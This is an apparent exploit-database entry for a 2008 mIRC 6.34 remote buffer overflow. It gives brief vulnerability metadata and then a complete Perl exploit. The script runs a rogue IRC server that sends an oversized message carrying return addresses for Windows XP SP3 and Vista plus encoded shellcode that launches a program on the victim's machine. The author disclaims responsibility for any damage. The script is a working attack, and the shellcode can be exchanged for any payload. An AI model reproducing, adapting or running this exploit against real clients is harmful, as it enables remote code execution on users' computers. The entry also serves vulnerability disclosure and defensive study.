mIRC 6.34 Remote Buffer Overflow Exploit

vendor:

mIRC

by:

SkD

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: mIRC

Affected Version From: 6.34

Affected Version To: 6.34

Patch Exists: YES

Related CWE: N/A

CPE: a:mirc:mirc:6.34

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3, Windows Vista SP0

2009

mIRC 6.34 Remote Buffer Overflow Exploit

A day's work of debugging and looking at mIRC revealed a buffer overflow vulnerability in mIRC 6.34. The exploit was tested on Windows XP SP3 English and Windows Vista SP0. The exploit uses a win32_exec payload to execute a calculator command. The exploit is triggered by sending a malicious payload to the server.

Mitigation:

Upgrade to the latest version of mIRC.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------



use IO::Socket;

if(!($ARGV[1]))
{
 print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
 print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
 print "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>\n[x] Example: mirc_exp.pl 6667 0\n\n";
 exit;
}


while(1)
{

my $sock=new IO::Socket::INET (
Listen    => 1,

LocalAddr => '127.0.0.1',

LocalPort => $ARGV[0],

Proto     => 'tcp');  

die unless $sock;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com 
my $shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
"\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4".
"\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8".
"\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc".
"\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97".
"\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5".
"\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a".
"\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99".
"\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5".
"\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1";

print "[x] Listening on port ".$ARGV[0]."..\r\n";
$s=$sock->accept();
print "[x] Got a user!\r\n";
$overflow = "\x41" x 307;
$overflow2 = "B" x 12;
$eip_vista = "\x66\x1c\xc2\x76";    #Normaliz.DLL pop pop ret
$eip2_vista = "\xd3\xdb\x54\x77";   #MSFCT.DLL jmp esp
$eip_xpsp3 = "\xd1\xfb\x92\x77";    #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
$eip2_xpsp3 = "\xb7\x87\x9d\x77";   #SETUPAPI.DLL 0x779D87B7 jmp esp
$addr = "\xb5\xb5\xfd\x7f"; 
$nop_sled = "\x90" x 4;
$jmp = "\xEB\x03\xFF\xFF";

print "[x] Sending packets..\r\n";

print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n";
sleep(1);
if($ARGV[1] == "1"){
print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG  wow : /FINGER wow.\r\n";
}else{
print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG  wow : /FINGER wow.\r\n";
}
print "[x] Check it out!\r\n";
}

# milw0rm.com [2008-10-04]